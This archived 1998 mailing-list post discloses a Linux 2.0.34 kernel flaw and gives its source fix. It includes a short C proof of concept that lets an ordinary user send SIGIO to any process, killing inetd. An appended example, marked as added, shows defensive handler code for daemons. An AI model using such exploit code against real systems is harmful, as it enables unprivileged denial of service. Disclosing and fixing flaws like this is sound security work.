Serious Linux 2.0.34 security problem

From: David Luyer (luyerat_private)
Date: Tue Jun 30 1998 - 00:10:47 PDT


    I just saw this mentioned on linux-kernel and confirmed it;
    
    #include <fcntl.h>
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main(int argc, char *argv[]) {
      int s, p;
    
      if(argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(0);
      } else {
        p = atoi(argv[1]);
      }
      fcntl(0,F_SETOWN,p);
      s = fcntl(0,F_GETFL,0);
      fcntl(0,F_SETFL,s|O_ASYNC);
      printf("Sending SIGIO - press enter.\n");
      getchar();
      fcntl(0,F_SETFL,s&~O_ASYNC);
      printf("SIGIO send attempted.\n");
      return 0;
    }
    
    This can kill the inetd process under Linux 2.0.34 from a normal user
    account by sending a SIGIO.  Very bad.
    
    The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
    is approximately 139.
    
    David.
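    Added example (not part of the original post or of the kernel fix it describes): the daemon side of this bug. On Linux the default action for SIGIO is to terminate the process, so a daemon such as inetd that never requested asynchronous I/O dies the moment a stray SIGIO reaches it. The program below audits the current SIGIO disposition and installs a harmless SA_RESTART handler, after which a self-delivered SIGIO is counted instead of fatal; all function names are my own.

```c
/* Added example: harden a daemon against unexpected SIGIO.
 * Default SIGIO disposition on Linux is "terminate" (signal(7)), so an
 * unsolicited SIGIO kills any process that has not set a disposition. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>

static volatile sig_atomic_t sigio_count;   /* SIGIOs seen so far */

/* Handler: only async-signal-safe work, here just a counter bump. */
static void on_sigio(int sig) { (void)sig; sigio_count++; }

/* Returns 1 if SIGIO is still SIG_DFL (an unexpected SIGIO would
 * terminate this process), 0 if it is ignored or handled, -1 on error. */
int sigio_would_terminate(void) {
    struct sigaction cur;
    if (sigaction(SIGIO, NULL, &cur) != 0) return -1;
    return cur.sa_handler == SIG_DFL ? 1 : 0;
}

/* Install a counting handler.  SA_RESTART keeps blocking calls such as
 * accept() and read() from failing with EINTR when the signal lands.
 * Returns 0 on success, -1 on error. */
int harden_sigio(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigio;
    sa.sa_flags = SA_RESTART;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGIO, &sa, NULL);
}

/* Deliver SIGIO to ourselves and return the running count.  With the
 * default disposition this function would never return. */
int sigio_seen_after_self_signal(void) {
    raise(SIGIO);
    return (int)sigio_count;
}

int main(void) {
    printf("before: SIGIO would terminate = %d\n", sigio_would_terminate());
    if (harden_sigio() != 0) { perror("sigaction"); return 1; }
    printf("after:  SIGIO would terminate = %d\n", sigio_would_terminate());
    printf("survived SIGIO; count = %d\n", sigio_seen_after_self_signal());
    return 0;
}
```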
    

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:00:56 PDT